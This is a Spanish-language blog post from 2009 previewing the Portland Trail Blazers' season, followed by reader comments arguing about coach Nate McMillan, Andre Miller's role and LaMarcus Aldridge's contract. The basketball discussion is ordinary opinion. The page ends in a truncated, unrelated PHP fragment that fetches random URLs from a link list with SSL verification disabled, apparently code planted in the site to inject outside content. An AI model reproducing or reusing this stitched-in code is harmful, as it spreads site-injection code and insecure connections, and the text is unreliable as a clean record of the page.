Portland Trail Blazers: A las puertas

16 de October de 2009 por MagicJohnson32

amillerblaz21, 32, 41, 54. Los números corresponden a la cifra de victorias cosechadas por los Blazers en las pasadas cuatro temporadas, desde la penosa 2005-2006 hasta la 2008-2009. Desde aquel momento de inflexión, la marcha del ex GM John Nash en el verano de 2006, el equipo de Oregon ha sido observado como un diamante en bruto cuya cristalización era únicamente cuestión de tiempo. La hora se acerca, pero todavía habrá que esperar.

El indiscutible ojo de Kevin Pritchard para detectar el talento ha acelerado la transición de los Blazers, ejemplar y con el único borrón del lamentable comportamiento en el caso Miles. Las amenazas de Pritchard, lógicamente, no surtieron efecto y esta temporada Portland tendrá que pagar a Darius Miles los 9 millones de dólares contemplados en el contrato que en su día le firmaron.

Eso no ha impedido que la franquicia haya sido de las más activas en el mercado de agentes libres. Tras el plantón de Turkoglu, que por algún motivo acabó decantándose por los Raptors, y los fallidos intentos de hacerse con David Lee y Paul Millsap, Pritchard tiró de sentido común y fue a por el mejor jugador disponible en el mercado de agentes libres: Andre Miller. El ex Sixers no sólo cubre la posición más débil de la plantilla sino que aporta una veteranía que será de gran utilidad en un grupo extremadamente joven: Roy, Aldridge, Oden, Rudy, Webster, Outlaw, Bayless y Batum promedian menos de 23 años de edad. Esta inexperiencia pasó factura en los pasados Playoffs, en los que el equipo redujo su rendimiento con respecto a la regular season y fueron claramente superados en primera ronda por los Rockets.

La llegada de Miller, toda una garantía en cuanto a rendimiento, obligará a ciertos ajustes en el juego de los Blazers, que harían bien en liberar a Roy de unas responsabilidades en la distribución de juego que con frecuencia atascaban  y ralentizaban el ataque de los de McMillan (fue el equipo con menor número de posesiones por partido la pasada temporada). Todo ello, claro, si el técnico no cumple su esperpéntica amenaza de mantener a Steve Blake de titular. Según lo visto en los algunos partidos de training camp, McMillan puede haber cambiado de opinión; sin embargo, no hay que descartar la posibilidad de que Miller encabece la segunda unidad pese a que el ex Sixers ha reconocido que, de saber que no sería titular, jamás habría aceptado la oferta de los Blazers.

El jefe, en cualquier caso, seguirá siendo Brandon Roy, quien sobre el parqué goza de plenos poderes en la toma de decisiones. Roy, consolidado ya como jugador franquicia y uno de los mejores escoltas del mundo, mejora su rendimiento año a año, especialmente en el apartado anotador. Con un base como Miller a su lado, Roy podrá (y royodenlamarcusdeberá) jugar más sin balón, algo que no impedirá que vuelva a brillar a nivel All-Star. Los Blazers ya se han asegurado su continuidad con un contrato de 5 años por el máximo (en torno a 80 millones).

Todavía sin renovar pero casi tan esencial como Roy resulta LaMarcus Aldridge. Su rendimiento no mantuvo el año pasado una curva ascendente tan pronunciada como la de Roy (de hecho, sus puntos, rebotes y tapones se redujeron levemente) pero su calidad es indudable y hay que esperar de él aún más de lo que ha venido ofreciendo. De que lo haga depende buena parte del éxito del proyecto. Junto a él estará de inicio Greg Oden, si es que su físico no vuelve a resentirse. Es lógico tener reservas sobre el número del draft de 2007, tanto por su propensión a las lesiones como sus problemas con las faltas, pero todo lo que progrese será margen de mejora para un equipo que ya resultaba competitivo con una versión muy menor de Oden. En caso de lesión o bajo rendimiento, Oden cedería el puesto a Przyzbilla, tan discreto como sólido ya sea de inicio o partiendo desde el banco.

Las dudas llegan esencialmente en el puesto de alero titular. Si se mantiene sano -algo que está por ver después de que se le haya detectado ‘inestabilidad’ en una rodilla- es probable que McMillan mantenga al jovencísimo Batum, más aún tras su notable actuación en Polonia. Si no, optará por el reaparecido Martell Webster, quien se perdió toda la pasada temporada pero parece plenamente recuperado y listo para retomar su rol como triplista. Difícilmente veremos a Rudy Fernández de inicio, pese a que tiene los minutos garantizados compaginando las posiciones de 2 y 3, y seguramente será quien acabe los partidos como alero. El mallorquín puede ser uno de los grandes beneficiados por la aceleración del ritmo de juego que aportará Andre Miller y, por su bien, debería aprovecharlo para royrudydeshacerse de la etiqueta  de mero triplista que él mismo se ganó con nada menos que 5.1 triples lanzados por encuentro.

Otra rotación para la posición de forward,  además del retornado Ime Udoka, es Travis Outlaw. Estancado en su progresión, Outlaw apenas aporta cosas al margen de puntos y su indudable decisión y acierto en el clutch. Poco reboteador, defensor inconstante y más bien egoísta, Outlaw afronta su contract year con muchas papeletas de abandonar la franquicia a final de temporada, si no lo hace antes vía traspaso. McMillan puede optar por darle cancha y revalorizarlo de cara a su traspaso, o bien marginarlo al fondo del banquillo, distribuir los minutos de alero entre Batum, Rudy y Webster, y dar la suplencia de Aldridge al veteranísimo Juwan Howard o alguno de los rookies, Cunningham y Pendergraph.

Hay que esperar, en definitiva, que Portland siga su línea ascendente y gane una cifra de partidos cercana a los 60. De  la evolución de Oden y Rudy, y esencialmente de cómo encaje Andre Miller, dependerá que este crecimiento permita a los de Oregon resultar tan competitivos como para optar a las Finales de Conferencia. El salto, ante rivales de entidad y calidad contrastada, con Lakers y Spurs al frente, se antoja excesivo… por ahora. Sí, el momento de los Blazers se acerca,  tanto que está a las puertas y seguro que acabará llegando. Pero todavía no.

Quinteto titular: Andre Miller, Brandon Roy, Nicolas Batum, LaMarcus Aldridge y Greg Oden.

Sexto hombre: Rudy Fernández.

Pronóstico: Semifinales de Conferencia.

Comenta

28 comentarios a esta entrada

  1. Óscar dice:
    #1

    Perfecto análisis, Magic.
    Con un fichaje tipo Millsap o Lee, sería una súperplantilla, praparada para todo. Pero estoy de acuerdo con que para pensar en lo máximo habrá que esperar, en principio, al menos un año más.
    Resuelto el déficit en el puesto de base nada menos que con Andre Miller (yo también espero que al final McMillan se lo piense y lo ponga titular), es esa posición de “4” suplente de LaMarcus Aldridge la que podría ofrecer más dudas. Hay muchas alternativas, pero a lo mejor no del todo sólidas: Outlaw, Udoka, J.Howard, Cunningham, Pendergraph (lesión larga). No es descartable lo que apuntas de traspasar ya a Outlaw para conseguir un cuatro agresivo y claramente interior, de ese tipo de jugador como Speights, Lee, Millsap, Bass, Gooden, May, … Muy complicado. Y yo espero mucho de Travis, siempre imprevisible.
    Lo mejor pese a los 9 millones del ínclito Miles que cuentan para el tope de este año, es que Portland sólo se gastará este año en salarios unos 57,3 mill. $, de los que menos en el Oeste y el que menos de los equipos punteros de la Conferencia, y por debajo del límite salarial. Eso es muy buena noticia, no sólo para este año sino para los que vienen. Y la incorporación de varios jugadores veteranos, manteniendo el bloque muy joven, estaba cantada. Era necesario, para el nivel de los entrenamientos en primer lugar.
    A Aldridge hay que renovarlo (acaba en 2010, con oferta cualificada para la siguiente), pero yo no tengo prisa, puede ser un acicate para que explote del todo, vaya al All-Star de Dallas y entonces hacerle un contrato tipo Roy y asentar el proyecto, espectacular para el próximo lustro.
    Me quedo por último con la frase (con cierto resquemor por cierto) de Sergio Rodríguez respecto al plantel de los Blazers para esta campaña: “En Portland hay muchos jugadores que TIENEN que jugar, más que pueden jugar”. Es verdad. De cómo resuelva el cuerpo técnico ese aspecto dependerá parte del éxito de este joven y muy atractivo equipo. Y lo que hemos hablado muchas veces: será clave que Oden y Webster no vuelvan a tener problemas de lesiones, al menos tan graves.
    GO BLAZERS !!

      Citar

  2. jas dice:
    #2

    No coincido en una cosa… no creo que fueran eliminados de playoffs por la falta de experiencia de los jugadores, creo que fueron eliminados de playoffs por la inexperiencia del entrenador.
    En cuanto a Aldridge Allstars? lo dudo bastante, no lo descarto, pero lo dudo, no me parece un jugador muy fuera de lo normal…

      Citar

  3. MagicJohnson32 dice:
    #3

    Hombre, JAS, McMillan lleva entrenado como head coach desde el 2001, si no me equivoco. En los Playoffs sólo Roy y a ratos Aldridge dieron la cara. Existe cierta tendencia a culpar a McMillan de todo lo malo que pasa en los Blazers (ya verás cuando entre en la conversación Deer, jojo), pero en serio, deberíamos plantearnos hasta qué punto el entrenador es el culpable de que los Blazers se limitasen al Roy-sistema con tanta frecuencia y de que Rudy y compañía desapareciesen en Playoffs.
    Óscar, la renovación de Aldridge está avanzada y llegará con toda probabilidad antes del 31 de octubre. Piensa que ese día acaba el plazo para firmar la ampliación de contrato y, de no llegar a un acuerdo, Aldridge se convertiría en agente libre restringido. Yo, de ser Pritchard, no correría el riesgo.

      Citar

  4. sergio dice:
    #4

    Pues no se me ocurre otro motivo para el Roy-sistema que echarle la culpa a McMillan…. que algunos jugadores desaparezcan en Playoffs si puede ser sintoma de juventud pero vamos, perder con los Houston de Yao, Artest, Scola, Battier, etc… en 7 partidos (como LAL) no es mala cosa para un equipo al que no le ha llegado su mejor momento. Creo que fue una eliminatoria bonita pero decepcionante para quien nos gusta este equipo.

      Citar

  5. MagicJohnson32 dice:
    #5

    Yo sólo pregunto: Que Roy la suba, se pase botando 20 segundos y se la juegue en 1on1 ¿es culpa de McMillan o es culpa de Roy? ¿Que Rudy se limite a tirarse 5 triples de media en 20-y-tantos minutos es culpa de McMillan o es culpa de Rudy?

    Y, en fin, en un equipo sin prácticamente jugadores de +25 años y en el que diría que sólo Blake y Przyzbilla habían jugado unos playoffs antes, me parece de cajón decir que la inexperiencia pasó factura.

      Citar

  6. aro_pasado_no_newtoniano dice:
    #6

    McMillan dimissió,,,con o sin Sergio.

      Citar

  7. aro_pasado_no_newtoniano dice:
    #7

    Manolete y Kennedy fueron aniquilados por McMillan.

    Él invento el aceite de Colza..

    Él la hebilla del caso Gürtel.

    Él recomendó a Michael Jackson que tomara demerol.

    En serio…. me mata el Roy sisteam,,, igual es buen tio,,todos le adoran,, y los jugadores cuando acaban su relación son mejores y mejores personas,,,,Pero en los partidos como si pones a Romay.

      Citar

  8. Óscar dice:
    #8

    Magic, no sabía que lo de Aldridge estuviese tan cerca… me alegro, cuanto antes mejor y como dices no hay que correr riesgos. LaMarcus tiene que ir al All-Star, por condiciones no va a ser, pero se lo tiene que creer del todo y ser más agresivo en el juego interior y no limitarse a su tirito, tiene que mejorar mucho en ese aspecto, como siempre dice McMillan. Si lo hace, será grande de verdad. Además, él es texano y de Dallas, y jugó en la Universidad de Texas. Vaya partido de las estrellas en el Dallas Cowboys Stadium, creo que van a meter a 80.000 almas… A ver si lo vemos entre los mejores, pero recordar que en julio cumplió sólo 24 añitos…
    Y a Sergio: a mí también me decepcionó las series vs. Houston, después del primer partido en Portland y perder la ventaja de campo… ya lo veía muy difícil, inviable. Sí pudo pesar la inexperiencia, tanto de los jugadores como de McMillan, pero los Rockets merecieron el 4-2 (fueron 6 partidos, no 7).

      Citar

  9. sergio dice:
    #9

    am… en 6… no macordaba bien …

    El caso es que eran eliminatorias muy dificiles. Y aparte, creo que McMillan es el culpable de que Roy la suba, la tengo 20 segundos y se juegue el 1 contra 1 porque ¿¿¿que es la figura del entrenador sino la de la autoridad para decidir lo mejor para el equipo??? si Roy hace eso una vez OK…. dos, vale… tres al banco o si no es porque lo has mandado tu

      Citar

  10. TheDeerHunter dice:
    #10

    A mí McMillan me parece el típico entrenador cobarde y barraquero, ideal para equipos pequeños a los que no se les exige demasiado, ni en resultados ni en juego.
    Para defender relativamente bien, tampoco hace falta ser un visionario. Muchas veces únicamente hace falta implantar disciplina, que para algunos es sinónimo de someter al personal anulándole cualquier atisbo de iniciativa propia. Es una opción algo detestable, pero es innegable que en ocasiones funciona.
    De todas formas conviene distinguir entre defender bien y alargar las posesiones hasta matar al público y rivales de tedio, maquillando así tus puntos encajados… pero hay quien confunde esto.
    McMillan no se sale del patrón en todo este asunto. Es mediocre hasta en su especialidad. Aburre a las obejas y ha tenido la suerte de llevar a jugadores jovenes a los que ha podido malear y con los más débiles toda la leña del mundo, pero cuando algún gallo se le ha rebotado la respuesta ha sido el achante… ese es su perfil (el bueno) y hasta aquí podemos hablar de él.

    Ofensivamente, pues se puede observar cada partido sea o no de playoffs el abanico táctico con el que nos abruma a todos. Vacío cósmico. Creo que mi sobrino de 7 años tiene más recursos tácticos que él. No tengo claro si podría ejecutar más de 5 o 6 movimientos aprendidos en una partida de ajedrez… prefiero no comprobarlo, que lo haga otro que tenga más paciencia que yo.
    Ha tenido la suerte de enganchar un jugador como Roy, al que no parece molestarle quemarse haciendo de hombre orquesta en un equipo con muchas posibilidades… a los que les molestará no participar, supongo, será al resto. Pero como de momento han primado los “comparsas” mediocres sobre los talentosos estos le están agradecidos. Serán titulares Blake sobre Miller, Batum sobre Rudy y Webster y Przibilla sobre Oden… y porque no tiene otro petardo mejor para poner en lugar de Aldridge… Lo iremos viendo.
    Lo que más me maravilló es que, tras la derrota contra Houston, dijo que le faltaba músculo para defender más, cuando fue una de las series más tostón que ha habido en la historia… sobre todo por su parte. Después ha traído a Miller (a ser suplente) e intentaron fichar a Turkoglu (seguramente con la idea de que fuera suplente) Vaya tela…

    Hasta ahora nunca se le ha exigido nada a McMillan… todo parecía vino y rosas porque los resultados no han sido malos (porque no hablemos del juego) dentro de que se esperaba poco o nada y el personal importante apenas se ha quejado de nada.
    Ahora ya nada de eso. Lo que dice Magic de a las puertas… no va a ser así. Si no queda entre los 4 primeros del oeste hay quien ya va a mosquearse un poco. Tiene muy buenos jugadores en segunda línea que ya tienen algo de voz , alguno que pretende ganarse un contrataco este año, y que no se van a contentar con que Roy se tire hasta las zapatacas. Quizás la solución sea ir dejándolos irse uno a uno y traer a jugadores afines, con musculitos…. como a McMillan le molan.

    En fin, que todos decís que cojonudo futuro tiene Portland… cuantos millones para fichar (que con las renovaciones que deberían acometer veremos) Pero mientras dirija el tipo este la barca este equipo a lo más que va a llegar es a lo que hicieron los Sixers de Iverson. Ese es el modelo que se persigue.

      Citar

  11. sergio dice:
    #11

    Deer… ovejas con b? ¬¬

    Se te perdona porque estan al lao en el teclado y porque todo lo que dices es una santa verdad xD

      Citar

  12. TheDeerHunter dice:
    #12

    cuando hablo de McMillan me enciendo… ya no se ni lo que pongo.
    Además, en el pueblo de McMillan oveja es con b

      Citar

  13. Óscar dice:
    #13

    Durísimas las palabras del cazador de ciervos, señores. Pobre McMillan.
    Nate, demuéstrales que se equivocan, la Virgen !!! jeje

    En España se le cogió manía con lo de Sergio (veremos cuánto acaba jugando en estos Kings) y parece que nadie le quita ya el sambenito de conservador, cuadriculao, etc.
    Al menos en este foro somos varios los que le apreciamos y defendemos. A mí no es el entrenador que más me gusta del Mundo, pero como he dicho me parece un técnico idóneo para este proyecto de equipo tan joven y en progresión.
    Echo en falta que no deje correr más a los jugadores tras rebote defensivo (fue de los equipos que menos puntos anotaron en contraataque el año pasado), sobre todo cuando quiere basar el juego en una fuerte defensa. Eso mejorará a buen seguro con Andre, porque Blake no arriesga ni tiene demasiada visión (sí tiene otras virtudes).
    El otro pero que le pongo es lo que decís de la “creatividad” o variedad en las jugadas decisivas de final de partido, pero en finales apretados ganó bastante más partidos la temporada pasada de los que perdió (de acuerdo, gracias a Roy).
    No sé, son opiniones pero yo al menos no lo cambiaba ahora mismo por ninguno, aunque también no lo ficharía nunca para otros equipos tipo PHX, LAL, GSW, ORL, DAL, etc.

      Citar

  14. M dice:
    #14

    jajajajaja, yo estoyde acuerdo, pero siguiendo mi línea irracionalista de presentimientos sin base, creo que este año va a hacer algo bueno, y con ayuda de Miller van a ser un equipo mucho más ordenado en los momentos clave. Pero también creo que ya basta de tomarlos como promesa, este año tienen que cumplir ya, y se les va a juzgar con más exigencia, como corresponde.

      Citar

  15. sergio dice:
    #15

    Hombre, que yo le coja mania con Sergio Rodriguez dejando fuera a un jugador con un nombre tan fantastico entra en lo normal…. pero ni aun asi. Sergio Rodriguez no tenia lugar casi en el equipo y no me parece realmente mal que no le diera oportunidades (aunque el chaval no lo hiciera mal). Creo que aunque tenga algunas mas en Sacramento, no va a terminar de cuajar. Ojala me equivoque,

    Que Portland ganara finales apretados se lo debemos a Roy… no a McMillan. Fijate si no como casi todos los tiros ganadores de Roy son en 1 contra 1 y casi siempre con un tio delante. Otra gente plantea alternativas aunque sea para dar confianza al resto del equipo (me refiero a canastas tipo Steve Kerr contra Utah, no como Llull contra Turquia) Creo que tu opinion sobre McMillan cambiaria si vieras a otro entrenador disponiendo de la plantilla que el tiene.

    Y como bien dices… Andre Miller es el jugador indicado para defensa y contragolpe. Eso lo sabemos todos. Pues a ver con que nos sale el tito Mac. Seguro que Roy acaba de base con Batum y Outlaw. Si por ser…

      Citar

  16. MagicJohnson32 dice:
    #16

    Sergio, el 90% de los tiros decisivos en la NBA se plantean en 1 contra 1 para la estrella, no me parece que lo de los Blazers sea ni mucho menos una excepción. Es más, Outlaw ha metido varias canastas decisivas las últimas temporadas, supongo que los jugadores no entendieron la orden de McMillan de dársela a Roy y largarse a una esquina :p)

      Citar

  17. L.Casei dice:
    #17

    Y además, no entiendo Sergio como todo lo bueno se deba a Roy y lo malo a McMillan. Es como decir que los Lakers sin Kobe no serían lo mismo o que no tiene nada que ver lo que prepare Phil Jackson… pues bueno.
    Roy decidió al menos 5 ó 6 partidos el año pasado metiendo la canasta vencedora, sobre todo buscando el 1 vs.1. En ese aspecto no hay nadie como él en la NBA. Si no confías en él con esos antecedentes, sería ilógico. Pasa en todos los equipos con jugadores grandes de la NBA, no sé donde está lo criticable o lo extraño.
    Que “Mac” no tiene que encorsetar tanto los jugadores para ser menos previsible, estoy de acuerdo. Pero los números hablan por sí mismos. Llegó a Portland con un equipo deshecho en 2005/06: 21-61. En la 2006/07 lograron 32 victorias, y llegó al 50 por ciento de victorias con un equipo muy normalito y empezando a perfilarse con los imberbes Roy y Aldridge en 2007/08 (41-41).
    La temporada pasada era el momento de exigirle más, y logró nada menos que 54 victorias, el segundo mejor récord del Oeste junto con Denver y San Antonio. En playoff, la verdad, decepcionó bastante.
    Para mí, el gran artífice de la progresión de los Blazers ha sido Kevin Pritchard, que ha hecho encaje de bolillos hasta llegar a conseguir un equipo de un POTENCIAL enorme (por ahora nada más), encajando todas las piezas y encima con mucho margen de maniobra en los próximos años para seguir creciendo. El único lunar ha sido el no poder fichar a otro jugador interior de garantías, pero a mí me da que los tiros del fichaje de Jarron Collins pueden ir por buscar por ejemplo un traspaso de Outlaw y Przybilla por un 4/5 físico, de primer nivel. A ver qué pasa.
    Y el año que viene con Claver, que ha empezado de cine la ACB con el Valencia B. y va a ser la leche… 1ª ronda, puesto 22… Pritchard sí que sabe.

      Citar

  18. Kiki dice:
    #18

    Por cierto, qué feo está el Andre Miller con ese peinado… y el #24 no le pega nada, le va más un nº bajo tipo 1 ó 7… Webster se ha decicido por el #23 olvidando el mal fario del 8… Y Batum sigue con el #88, horripilante como diría Trecet.
    La culpa es de McMillan jejeje !!! QUE VIVA McMILLAN !!!

      Citar

  19. Viva_Dirk dice:
    #19

    ‘este equipo a lo más que va a llegar es a lo que hicieron los Sixers de Iverson’

    Deer, te prometo que esta frase tuya casi me ha emocionado :p

      Citar

  20. Óscar dice:
    #20

    Sorprende en la megaporra los apoyos que tiene Portland : entre los primeros del Oeste, Oden para muchos jugador con más progresión, Roy en algún quinteto ideal (difícil con CP3, Wade o Kobe por ahí), Pritchard de ejecutivo… y McMILLAN para bastantes coach of the year !!!!!!
    Deer, de esta no te recuperas jijii

      Citar

  21. sergio dice:
    #21

    @ Kiki: el numero 88 es el numero de Hitler. Espero que un frances como Batum tenga otros motivos para ponerse ese numero en el dorsal…

    @ Magic y L.Casei: pues vosotros mismos me estais dando la razon…. Yo veo muy logico que se las juegue Roy y no Oden, por poner un ejemplo. Lo que no estoy de acuerdo es en eso del 1 contra 1… creo que mejorarian sus porcentajes de victorias con jugadas tipo bloqueos (posibilitas tambien un pick & roll como hicieron contra Bobcats para empatar el partido) que permitan generar segundas jugadas cuando creas desequilibrios. Las dos veces que recuerdo que sucedio (Phoenix y Denver) faltaban mas de 30 segundos por jugar y en ningun caso eran jugadas tras tiempo muerto…. por eso considero que son mas merito del equipo que del entrenador. El resto que recuerdo son del tipo que explica Magic: iros a las esquinas y hacedme aclarados… McMillan el visionario dixit.

    Y creo que la mejoria en resultados año tras año tiene mas que ver con una reconstruccion por parte de los GM (como decis… graaan trabajo de Pritchard) que con la figura del entrenador. Que un equipo basado en gente joven mejore es como que uno de viejos caiga en declive (vease Pistons).

    L. Casei, eso de que no debes encorsetar tanto a los jugadores para ser menos previsible es precisamente a lo que me refiero… no tengo nada en contra de Portland ni digo que cierta autoridad fuera de la pista no sea necesaria para llevar a un equipo de una edad media tan baja… pero en la pista las cosas cambian… y mas con la creatividad ofensiva que tienen algunos de sus muchachos.

    Me chirria que un entrenador que tiene el record de asistencias para un rookie (25) cree un equipo que es el 24º en asistencias por partido, teniendo a gente muy capaz. Y tampoco se me olvida el partido contra Houston a finales de Abril en el que habiendo metido 14 puntos Rudy y estando practicamente perfecto en defensa, lo hace ingresar 40 segundos en pista para luego quitarlo. La canasta que decidia el partido se la tiro Blake corriendose todo la pista y lanzando un tiro que no toco ni aro.Y no es por ser Rudy e…. Aparte de que lo unico que hicieron en Houston fue parar a Roy para dominar la eliminatoria… y no lo digo yo. Lo dicen tambien los principales analistas de la NBA y la ESPN que saben muuuucho mas que yo de todo eso. Todos hablan de una falta de quimica en el equipo en los momentos apretados que es algo que genera victorias importantisimas (como creo que tambien les ha pasado a Cleveland este año)

    Solo creo que cuando al equipo se le exiga donde tiene que exigirsele (Playoffs) volveran a caer porque en esos partidos el peso del entrenador es muy grande para solventar las eliminatorias. Mirad si no el repaso que le dio Pat Riley a Dallas (San Wade aparte)

    Que conste que respeto mucho vuestras opiniones… pero no comparto mas que la de Deer xD (como le den el Coach of the Year me hago seguidor del voley-playa)

      Citar

  22. MagicJohnson32 dice:
    #22

    Dice ESPN que la ampliación de contrato de Aldridge está hecha: 5 años y 65 kilos.

      Citar

  23. Óscar dice:
    #23

    Contratazo, se lo merece. Ahora, a fajarse más como dice el tío Mac…

      Citar

  24. Txusma dice:
    #24

    Lo difícil no es llegar, sino mantenerse…

      Citar

  25. TheDeerHunter dice:
    #25

    Sufre de problemas cardiacos ¿no??

      Citar

  26. Óscar dice:
    #26

    Que yo sepa, no… No me asustes… Qué poco dura la alegría en la casa del pobre… juju

      Citar

  27. TheDeerHunter dice:
    #27

    Pues lamento asustarte

    lo había leído de Paniagua… no conozco el tema con exactitud:
    http://www.solobasket.com/blogs/comentarios/one/from/the/heart/c-474.html#zonacomentarios

    más vínculos:
    http://blog.oregonlive.com/blazers/2007/04/lamarcus_aldridge_diagnosed_wi.html
    http://en.wikipedia.org/wiki/LaMarcus_Aldridge

    En fin… que el problema lo padece, pero por lo visto de momento no le impide desarrollar su juego. Si le han firmado ese contrataco es porque tienen en cuenta esta incidencia, supongo (aunque recordemos el caso reciente de Mobley)

      Citar

  28. Óscar dice:
    #28

    Pues no tenía ni idea … Dice Paniagua que Aldridge y Eddy Curry “están jugando a la ruleta rusa con su salud”, relacionándolo con la retirada de Cuttino Mobley… Esto es de Diciembre, pero no creo que haya cambiado mucho la cosa. Madre…
    He visto una información de Ultimate NBA respecto a los movimientos de Portland, que cuenta ahora mismo con 17 jugadores ras firmar al base australiano Patrick Mills, lesionado en los campus de verano: dice que Aldridge tendrá 65 + 5 millones más en incentivos en esos 5 años, pero éstos serán difíciles de conseguir, según comentan en ESPN.
    “Por otro lado, hay rumores de que Patrick Mills, lesionado en un pie y recién llegado in extremis a la franquicia para que los Blazers no perdieran sus derechos conseguidos en el draft, será el que se gane el puesto. Este jueves, Ime Udoka y Jarron Collins serán cortados, según el Oregonian. El GM Kevin Pritchard ha tomado la decisión para ahorrarse unos 400 mil dólares en base a ganar la máxima flexibilidad salarial ya que todavía están por debajo del Límite Salarial. Nate McMillan no está muy de acuerdo porque prefería un veterano a un rookie lesionado. Mills no tiene el contrato garantizado hasta el 10 de enero y su expectativa de baja médica coincide en el tiempo.” (sic).
    Collins, al parecer, tiene una oferta de Phoenix Suns esperándole para cuando sea cortado.
    Pues eso, ya sabemos quién corta el bacalao por muchos morritos que ponga McMillan… Me da pena lo de Udoka, en Portland jugó a un buen nivel en 06/07 y está a buen nivel en pretemporada, pero es que era demasiada tela en varios puestos…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>